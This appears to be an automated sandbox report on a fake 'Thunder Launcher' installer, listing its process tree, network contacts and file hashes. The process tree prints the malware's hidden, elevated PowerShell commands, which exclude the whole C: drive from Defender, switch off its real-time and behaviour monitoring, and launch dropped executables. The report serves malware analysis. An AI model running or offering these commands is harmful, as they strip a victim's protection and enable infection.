PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 1528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://goo.su/xQHo

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff4c4c46f8,0x7fff4c4c4708,0x7fff4c4c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5848 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,7242272514455114059,8835098835148661530,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe

"C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe"

C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe

"C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Start-Process "C:\Users\Admin\AppData\Local\Temp\/1720969296877.exe"'}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Start-Process C:\Users\Admin\AppData\Local\Temp\/1720969296877.exe

C:\Users\Admin\AppData\Local\Temp\1720969296877.exe

"C:\Users\Admin\AppData\Local\Temp\1720969296877.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe

"C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe"

C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe

"C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring

C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe

"C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe"

C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe

"C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Start-Process "C:\Users\Admin\AppData\Local\Temp\/1720969335043.exe"'}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Start-Process C:\Users\Admin\AppData\Local\Temp\/1720969335043.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Start-Process "C:\Users\Admin\AppData\Local\Temp\/1720969336975.exe"'}"

C:\Users\Admin\AppData\Local\Temp\1720969335043.exe

"C:\Users\Admin\AppData\Local\Temp\1720969335043.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Start-Process C:\Users\Admin\AppData\Local\Temp\/1720969336975.exe

C:\Users\Admin\AppData\Local\Temp\1720969336975.exe

"C:\Users\Admin\AppData\Local\Temp\1720969336975.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe

"C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe"

C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe

"C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\DisconnectMerge.jfif" /ForceBootstrapPaint3D

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 goo.su udp
US 172.67.139.105:443 goo.su tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 105.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
RU 77.91.77.145:80 77.91.77.145 tcp
US 8.8.8.8:53 145.77.91.77.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
RU 77.91.77.145:80 77.91.77.145 tcp
DE 88.198.89.4:80 88.198.89.4 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
RU 77.91.77.145:80 77.91.77.145 tcp
RU 77.91.77.145:80 77.91.77.145 tcp
US 8.8.8.8:53 4.89.198.88.in-addr.arpa udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 o0.u2024.icu udp
FI 95.217.245.123:443 o0.u2024.icu tcp
US 8.8.8.8:53 123.245.217.95.in-addr.arpa udp
RU 77.91.77.145:80 77.91.77.145 tcp
RU 77.91.77.145:80 77.91.77.145 tcp
NL 149.154.167.99:443 t.me tcp
RU 77.91.77.145:80 77.91.77.145 tcp
DE 88.198.89.4:80 88.198.89.4 tcp
RU 77.91.77.145:80 77.91.77.145 tcp
RU 77.91.77.145:80 77.91.77.145 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
RU 77.91.77.145:80 77.91.77.145 tcp
DE 88.198.89.4:80 88.198.89.4 tcp
RU 77.91.77.145:80 77.91.77.145 tcp
RU 77.91.77.145:80 77.91.77.145 tcp
NL 149.154.167.99:443 t.me tcp
FI 95.217.245.123:443 o0.u2024.icu tcp
NL 149.154.167.99:443 t.me tcp
FI 95.217.245.123:443 o0.u2024.icu tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
RU 77.91.77.145:80 77.91.77.145 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3ee50fb26a9d3f096c47ff8696c24321
SHA1 a8c83e798d2a8b31fec0820560525e80dfa4fe66
SHA256 d80ec29cb17280af0c7522b30a80ffa19d1e786c0b09accfe3234b967d23eb6f
SHA512 479c0d2b76850aa79b58f9e0a8ba5773bd8909d915b98c2e9dc3a95c0ac18d7741b2ee571df695c0305598d89651c7aef2ff7c2fedb8b6a6aa30057ecfc872c5

\??\pipe\LOCAL\crashpad_1920_AKEFYOOZSPYOEXTJ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

